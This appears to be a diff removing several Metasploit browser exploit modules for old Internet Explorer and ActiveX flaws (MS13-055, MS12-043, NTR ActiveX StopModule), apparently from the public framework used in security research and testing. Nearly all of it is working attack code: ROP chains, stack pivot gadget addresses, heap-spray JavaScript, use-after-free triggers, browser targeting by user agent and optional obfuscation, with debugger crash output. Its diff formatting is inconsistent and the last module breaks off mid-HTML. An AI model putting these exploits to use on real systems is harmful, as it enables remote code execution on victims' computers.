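-p = make_nops(44) #Nops
-p << "\xeb\x04\xff\xff" #Jmp over the pivot
-p << [mytarget.ret].pack('V') #Stack pivot
-p << payload.encoded
-
-rop_payload = generate_rop_payload('java', p)
-end
-
-code = (rop_payload) ? rop_payload : payload.encoded
-
-# fill the vtable
-vtable = [mytarget['TargetAddr']].pack('V*')
-
-#Convert code format so we can unescape() in JavaScript
-code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
-vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
-
-randnop = rand_text_alpha(rand(100) + 1)
-js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
-
-#Extract string based on what the setup is
-if mytarget.name == 'Internet Explorer 8 on XP SP3'
-js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
-elsif mytarget.name == 'Internet Explorer 8 on Windows 7'
-js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
-else
-js_extract_str = "var block = shellcode.substring(0, (0x40000-6)/2);"
-end
-
-js = <<-JS
-function timedRefresh(timeoutPeriod) {
-setTimeout("location.reload(true);",timeoutPeriod);
-}
-
-function enable_lfh(heaplib_obj, obj_size, max) {
-var vtable = unescape("#{vtable_js}");
-while (vtable.length < obj_size) vtable += vtable;
-var obj = vtable.substring(0, (obj_size-6)/2);
-for (var i=1; i < max; i++) {
-heaplib_obj.alloc(obj);
-}
-}
-
-function heap_spray(heaplib_obj, offset) {
-var code = unescape("#{code_js}");
-var #{randnop} = "#{js_nops}";
-var nops = unescape(#{randnop});
-
-while (nops.length < 0x1000) nops += nops;
-offset = nops.substring(0, #{mytarget['Offset']});
-var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
-while (shellcode.length < 0x40000) shellcode += shellcode;
-#{js_extract_str}
-heaplib_obj.gc();
-for (var i2=0; i2 < 0x400-1; i2++) {
-heaplib_obj.alloc(block);
-}
-}
-
-heap = new heapLib.ie(0x20000);
-heap_spray(heap, #{mytarget['Offset']});
-enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
-
-document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
-enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
-
-document.body.innerHTML += "<a id='tag_4' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
-enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
-
-document.body.innerHTML += "BBBBBBBBBBBBBBBBBBBBBBB";
-enable_lfh(heap, #{mytarget['ObjSize']}, 0x500);
-
-document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
-
-timedRefresh(2000);
-JS
-
-js = heaplib(js, {:noobfu => true})
-
-if datastore['OBFUSCATE']
-js = ::Rex::Exploitation::JSObfu.new(js)
-js.obfuscate(memory_sensitive: true)
-end
-
-html = <<-HTML
-<html>
-<body>
-<script language='javascript'>
-#{js}
-</script>
-</body>
-</html>
-HTML
-
-print_status("Sending exploit (#{mytarget.name})...")
-send_response(cli, html, {'Content-Type'=>'text/html'})
-end
-end
-
-
-=begin
-(b00.1ac): Access violation - code c0000005 (first chance)
-First chance exceptions are reported before any exception handling.
-This exception may be expected and handled.
-eax=0c0c0c0c ebx=0294b920 ecx=0bb300c8 edx=00000000 esi=020be380 edi=00000000
-eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0 nv up ei pl zr na pe nc
-cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
-mshtml!CElement::Doc+0x2:
-6363fcc6 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=????????
-=end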
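--- a/<PATH_UNKNOWN_3>
+++ /dev/null
@@ -1,200 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Exploit::Remote
-Rank = NormalRanking
-
-include Msf::Exploit::Remote::HttpServer::HTML
-include Msf::Exploit::RopDb
-
-def initialize(info={})
-super(update_info(info,
-'Name' => "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free",
-'Description' => %q{
-In IE8 standards mode, it's possible to cause a use-after-free condition by first
-creating an illogical table tree, where a CPhraseElement comes after CTableRow,
-with the final node being a sub table element. When the CPhraseElement's outer
-content is reset by using either outerText or outerHTML through an event handler,
-this triggers a free of its child element (in this case, a CAnchorElement, but
-some other objects apply too), but a reference is still kept in function
-SRunPointer::SpanQualifier. This function will then pass on the invalid reference
-to the next functions, eventually used in mshtml!CElement::Doc when it's trying to
-make a call to the object's SecurityContext virtual function at offset +0x70, which
-results a crash. An attacker can take advantage of this by first creating an
-CAnchorElement object, let it free, and then replace the freed memory with another
-fake object. Successfully doing so may allow arbitrary code execution under the
-context of the user.
-
-This bug is specific to Internet Explorer 8 only. It was originally discovered by
-Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again
-by Orange Tsai at Hitcon 2013.
-},
-'License' => MSF_LICENSE,
-'Author' =>
-[
-'Jose Antonio Vazquez Gonzalez', # Original discovery reported from iDefense
-'Orange Tsai', # Rediscovery, published at Hitcon 2013
-'Peter Vreugdenhil', # Joins the party (wtfuzz)
-'sinn3r' # Joins the party
-],
-'References' =>
-[
-[ 'CVE', '2013-3163' ],
-[ 'OSVDB', '94981' ],
-[ 'MSB', 'MS13-055' ],
-[ 'URL', 'https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf' ]
-],
-'Platform' => 'win',
-'Targets' =>
-[
-[ 'Automatic', {} ],
-[
-'IE 8 on Windows XP SP3',
-{
-'Rop' => :msvcrt,
-'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
-'Align' => 0x77c4d801 # add esp, 0x2c; ret
-}
-],
-[
-'IE 8 on Windows 7',
-{
-'Rop' => :jre,
-'Pivot' => 0x7c348b05, # xchg eax, esp; ret
-'Align' => 0x7C3445F8 # add esp, 0x2c; ret
-}
-]
-],
-'Payload' =>
-{
-'BadChars' => "\x00"
-},
-'DefaultOptions' =>
-{
-'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
-},
-'Privileged' => false,
-# Bug was patched in July 2013. Tsai was the first to publish the bug.
-# But Jose already reported way back in Oct 2012 (to iDefense)
-'DisclosureDate' => "Jul 09 2013",
-'DefaultTarget' => 0))
-end
-
-def get_target(agent)
-return target if target.name != 'Automatic'
-
-nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
-
-ie_name = "IE #{ie}"
-
-case nt
-when '5.1'
-os_name = 'Windows XP SP3'
-when '6.1'
-os_name = 'Windows 7'
-end
-
-targets.each do |t|
-if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
-return t
-end
-end
-
-nil
-end
-
-def get_payload(t)
-if t['Rop'] == :msvcrt
-print_status("Using msvcrt ROP")
-esp_align = "\x81\xc4\x54\xf2\xff\xff"
-rop_dll = 'msvcrt'
-opts = {'target'=>'xp'}
-else
-print_status("Using JRE ROP")
-esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
-rop_dll = 'java'
-opts = {}
-end
-
-p = esp_align + payload.encoded + rand_text_alpha(12000)
-generate_rop_payload(rop_dll, p, opts)
-end
-
-def get_html(t, p)
-junk = rand_text_alpha(4).unpack("V")[0].to_i
-js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*"))
-js_payload = Rex::Text.to_unescape(p)
-js_align = Rex::Text.to_unescape([t['Align']].pack("V*"))
-js_junk = Rex::Text.to_unescape([junk].pack("V*"))
-
-q_id = Rex::Text.rand_text_alpha(1)
-
-%Q|
-<!DOCTYPE html>
-<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
-<head>
-<meta>
-<?IMPORT namespace="t" implementation="#default#time2">
-</meta>
-</head>
-<script>
-#{js_mstime_malloc}
-
-window.onload = function() {
-var x = document.getElementById("#{q_id}");
-x.outerText = "";
-a = document.getElementById('myanim');
-
-p = '';
-for (i=0; i < 7; i++) {
-p += unescape("#{js_junk}");
-}
-p += unescape("#{js_payload}");
-
-fo = unescape("#{js_align}");
-for (i=0; i < 28; i++) {
-if (i == 27) { fo += unescape("#{js_pivot}"); }
-else { fo += unescape("#{js_align}"); }
-}
-
-fo += p;
-
-mstime_malloc({shellcode:fo, heapBlockSize:0x68, objId:"myanim"});
-}
-</script>
-<table>
-<tr>
-<div>
-<span>
-<q id='#{q_id}'>
-<a>
-<td></td>
-</a>
-</q>
-</span>
-</div>
-</tr>
-</table>
-<t:ANIMATECOLOR id="myanim"/>
-</html>
-|
-end
-
-def on_request_uri(cli, request)
-agent = request.headers['User-Agent']
-t = get_target(agent)
-
-if t
-p = get_payload(t)
-html = get_html(t, p)
-print_status("Sending exploit...")
-send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
-else
-print_error("Not a suitable target: #{agent}")
-send_not_found(cli)
-end
-end
-end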
@ -1,427 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "6.0",
|
||||
:ua_maxver => "9.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
|
||||
:method => "definition",
|
||||
:rank => GoodRanking
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption flaw in Microsoft XML Core Services
|
||||
when trying to access an uninitialized Node with the getDefinition API, which
|
||||
may corrupt memory allowing remote code execution.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'inking26', # Reliable exploitation
|
||||
'binjo', # Metasploit module
|
||||
'sinn3r', # Metasploit module
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-1889' ],
|
||||
[ 'BID', '53934' ],
|
||||
[ 'OSVDB', '82873'],
|
||||
[ 'MSB', 'MS12-043'],
|
||||
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
|
||||
[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'Space' => 1024
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# msxml3.dll 8.90.1101.0
|
||||
[ 'Automatic', {} ],
|
||||
[
|
||||
'IE 6 on Windows XP SP3',
|
||||
{
|
||||
'Offset' => '0x100',
|
||||
'Rop' => nil,
|
||||
'RandomHeap' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 7 on Windows XP SP3 / Vista SP2',
|
||||
{
|
||||
'Offset' => '0x100',
|
||||
'Rop' => nil,
|
||||
'RandomHeap' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 on Windows XP SP3',
|
||||
{
|
||||
'Rop' => :msvcrt,
|
||||
'RandomHeap' => false,
|
||||
'RopChainOffset' => '0x5f4',
|
||||
'Offset' => '0x0',
|
||||
'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 with Java 6 on Windows XP SP3',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'RandomHeap' => false,
|
||||
'RopChainOffset' => '0x5f4',
|
||||
'Offset' => '0x0',
|
||||
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'RandomHeap' => false,
|
||||
'RopChainOffset' => '0x5f4',
|
||||
'Offset' => '0x0',
|
||||
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 9 with Java 6 on Windows 7 SP1',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'RandomHeap' => true,
|
||||
'RopChainOffset' => 0x5FC,
|
||||
'Offset' => '0x0',
|
||||
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Jun 12 2012",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
])
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
|
||||
return targets[1] #IE 6 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows Vista SP2
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
|
||||
return targets[3] #IE 8 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
|
||||
return targets[5] #IE 8 on Windows 7 SP1/Vista SP2
|
||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
|
||||
return targets[6] #IE 9 on Windows 7 SP1
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def ret(t)
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
|
||||
when :jre
|
||||
return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll
|
||||
end
|
||||
end
|
||||
|
||||
def popret(t)
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
|
||||
when :jre
|
||||
return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll
|
||||
end
|
||||
end
|
||||
|
||||
def get_rop_chain(t)
|
||||
if t['RandomHeap']
|
||||
adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c
|
||||
adjust << ret(t)
|
||||
else
|
||||
adjust = ret(t)
|
||||
end
|
||||
|
||||
adjust << popret(t)
|
||||
adjust << [ t['StackPivot'] ].pack("V")
|
||||
adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :)
|
||||
|
||||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
|
||||
|
||||
else
|
||||
print_status("Using JRE ROP")
|
||||
rop = generate_rop_payload('java','',{'pivot'=>adjust})
|
||||
end
|
||||
|
||||
return rop
|
||||
end
|
||||
|
||||
def get_easy_spray(t, js_code, js_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
spray = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
|
||||
var offset = nops.substring(0, #{t['Offset']});
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
|
||||
heap_obj.gc();
|
||||
for (var z=1; z < 0x230; z++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
|
||||
end
|
||||
|
||||
|
||||
def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
randnop2 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
spray = <<-JS
|
||||
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
var #{randnop2} = "#{js_90_nops}";
|
||||
var nops_90 = unescape(#{randnop2});
|
||||
var rop_chain = unescape("#{js_rop}");
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
while (nops_90.length < 0x80000) nops_90 += nops_90;
|
||||
|
||||
var offset = nops.substring(0, #{t['Offset']});
|
||||
var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);
|
||||
var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
|
||||
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
|
||||
heap_obj.gc();
|
||||
for (var z=1; z < 0x230; z++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
|
||||
end
|
||||
|
||||
# Spray published by corelanc0d3r
|
||||
# Exploit writing tutorial part 11 : Heap Spraying Demystified
|
||||
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
|
||||
def get_random_spray(t, js_rop, js_code, js_90_nops)
|
||||
|
||||
spray = <<-JS
|
||||
|
||||
function randomblock(blocksize)
|
||||
{
|
||||
var theblock = "";
|
||||
for (var i = 0; i < blocksize; i++)
|
||||
{
|
||||
theblock += Math.floor(Math.random()*90)+10;
|
||||
}
|
||||
return theblock;
|
||||
}
|
||||
|
||||
function tounescape(block)
|
||||
{
|
||||
var blocklen = block.length;
|
||||
var unescapestr = "";
|
||||
for (var i = 0; i < blocklen-1; i=i+4)
|
||||
{
|
||||
unescapestr += "%u" + block.substring(i,i+4);
|
||||
}
|
||||
return unescapestr;
|
||||
}
|
||||
|
||||
var heap_obj = new heapLib.ie(0x10000);
|
||||
|
||||
var rop = unescape("#{js_rop}");
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop2} = "#{js_90_nops}";
|
||||
var nops_90 = unescape(#{randnop2});
|
||||
|
||||
while (nops_90.length < 0x80000) nops_90 += nops_90;
|
||||
|
||||
var offset_length = #{t['RopChainOffset']};
|
||||
|
||||
for (var i=0; i < 0x1000; i++) {
|
||||
var padding = unescape(tounescape(randomblock(0x1000)));
|
||||
while (padding.length < 0x1000) padding+= padding;
|
||||
var junk_offset = padding.substring(0, offset_length - code.length);
|
||||
var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);
|
||||
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
|
||||
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
|
||||
heap_obj.alloc(sprayblock);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
my_target = get_target(agent)
|
||||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
p = payload.encoded
|
||||
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
|
||||
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
|
||||
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
|
||||
|
||||
|
||||
if not my_target['Rop'].nil?
|
||||
js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
|
||||
end
|
||||
|
||||
if my_target['RandomHeap']
|
||||
js = get_random_spray(my_target, js_rop, js_code, js_90_nops)
|
||||
elsif not my_target['Rop'].nil?
|
||||
js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)
|
||||
else
|
||||
js = get_easy_spray(my_target, js_code, js_nops)
|
||||
end
|
||||
|
||||
js = heaplib(js, {:noobfu => true})
|
||||
|
||||
if datastore['OBFUSCATE']
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
|
||||
object_id = rand_text_alpha(4)
|
||||
|
||||
html = <<-EOS
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
#{js}
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object>
|
||||
<script>
|
||||
var obj = document.getElementById('#{object_id}').object;
|
||||
var src = unescape("%u0c08%u0c0c");
|
||||
while (src.length < 0x1002) src += src;
|
||||
src = "\\\\\\\\xxx" + src;
|
||||
src = src.substr(0, 0x1000 - 10);
|
||||
var pic = document.createElement("img");
|
||||
pic.src = src;
|
||||
pic.nameProp;
|
||||
obj.definition(#{rand(999) + 1});
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
(e34.358): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350
|
||||
eip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
msxml3!_dispatchImpl::InvokeHelper+0xb4:
|
||||
749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????
|
||||
|
||||
|
||||
0:008> r
|
||||
eax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528
|
||||
eip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
msxml3!_dispatchImpl::InvokeHelper+0xb4:
|
||||
749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????
|
||||
0:008> k
|
||||
ChildEBP RetAddr
|
||||
020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4
|
||||
020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e
|
||||
020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa
|
||||
020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50
|
||||
020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa
|
||||
020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d
|
||||
020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
|
||||
020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
|
||||
020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98
|
||||
020bf590 633a77ff jscript!VAR::InvokeByName+0x135
|
||||
020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
|
||||
020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce
|
||||
020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989
|
||||
020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff
|
||||
020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f
|
||||
020bf958 633891f1 jscript!CSession::Execute+0x175
|
||||
020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0
|
||||
020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a
|
||||
020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30
|
||||
020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219
|
||||
|
||||
=end
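--- a/PATH_NOT_SHOWN_ON_PAGE
+++ /dev/null
@@ -1,200 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Exploit::Remote
-Rank = NormalRanking
-
-include Msf::Exploit::Remote::HttpServer::HTML
-#include Msf::Exploit::Remote::BrowserAutopwn
-#
-#autopwn_info({
-# :ua_name => HttpClients::IE,
-# :ua_minver => "6.0",
-# :ua_maxver => "7.0",
-# :javascript => true,
-# :os_name => OperatingSystems::Match::WINDOWS,
-# :classid => "{E6ACF817-0A85-4EBE-9F0A-096C6488CFEA}",
-# :method => "StopModule",
-# :rank => NormalRanking
-#})
-
-
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'NTR ActiveX Control StopModule() Remote Code Execution',
-'Description' => %q{
-This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The
-vulnerability exists in the StopModule() method, where the lModule parameter is
-used to dereference memory to get a function pointer, which leads to code execution
-under the context of the user visiting a malicious web page.
-},
-'Author' =>
-[
-'Carsten Eiram', # Vulnerability discovery
-'juan vazquez' # Metasploit module
-],
-'License' => MSF_LICENSE,
-'References' =>
-[
-[ 'CVE', '2012-0267' ],
-[ 'OSVDB', '78253' ],
-[ 'BID', '51374' ],
-[ 'URL', 'http://secunia.com/secunia_research/2012-2/' ]
-],
-'DefaultOptions' =>
-{
-'EXITFUNC' => 'process',
-'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
-},
-'Payload' =>
-{
-'Space' => 1024,
-'DisableNops' => true,
-'BadChars' => ""
-},
-'Platform' => 'win',
-'Targets' =>
-[
-# NTR ActiveX 1.1.8.0
-[ 'Automatic', {} ],
-[ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
-[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
-[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4'} ]
-],
-'Privileged' => false,
-'DisclosureDate' => 'Jan 11 2012',
-'DefaultTarget' => 0))
-
-register_options(
-[
-OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-], self.class
-)
-
-end
-
-def get_spray(t, js_code, js_nops)
-randnop = rand_text_alpha(rand(100) + 1)
-
-spray = <<-JS
-var heap_obj = new heapLib.ie(0x20000);
-var code = unescape("#{js_code}");
-var #{randnop} = "#{js_nops}";
-var nops = unescape(#{randnop});
-
-while (nops.length < 0x80000) nops += nops;
-
-var offset = nops.substring(0, #{t['Offset']});
-var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
-
-while (shellcode.length < 0x40000) shellcode += shellcode;
-var block = shellcode.substring(0, (0x80000-6)/2);
-
-heap_obj.gc();
-for (var z=1; z < 500; z++) {
-heap_obj.alloc(block);
-}
-
-JS
-
-return spray
-
-end
-
-def get_target(agent)
-#If the user is already specified by the user, we'll just use that
-return target if target.name != 'Automatic'
-if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
-return targets[1] #IE 6 on Windows XP SP3
-elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
-return targets[2] #IE 7 on Windows XP SP3
-elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
-return targets[3] #IE 7 on Windows Vista SP2
-else
-return nil
-end
-end
-
-def on_request_uri(cli, request)
-
-agent = request.headers['User-Agent']
-print_status("User-agent: #{agent}")
-
-my_target = get_target(agent)
-
-# Avoid the attack if the victim doesn't have a setup we're targeting
-if my_target.nil?
-print_error("Browser not supported: #{agent}")
-send_not_found(cli)
-return
-end
-
-p = payload.encoded
-js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
-js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
-js = get_spray(my_target, js_code, js_nops)
-
-js = heaplib(js, {:noobfu => true})
-
-if datastore['OBFUSCATE']
-js = ::Rex::Exploitation::JSObfu.new(js)
-js.obfuscate(memory_sensitive: true)
-end
-
-address = 0x0c0c0c0c / 0x134
-
-html = <<-MYHTML
-<html>
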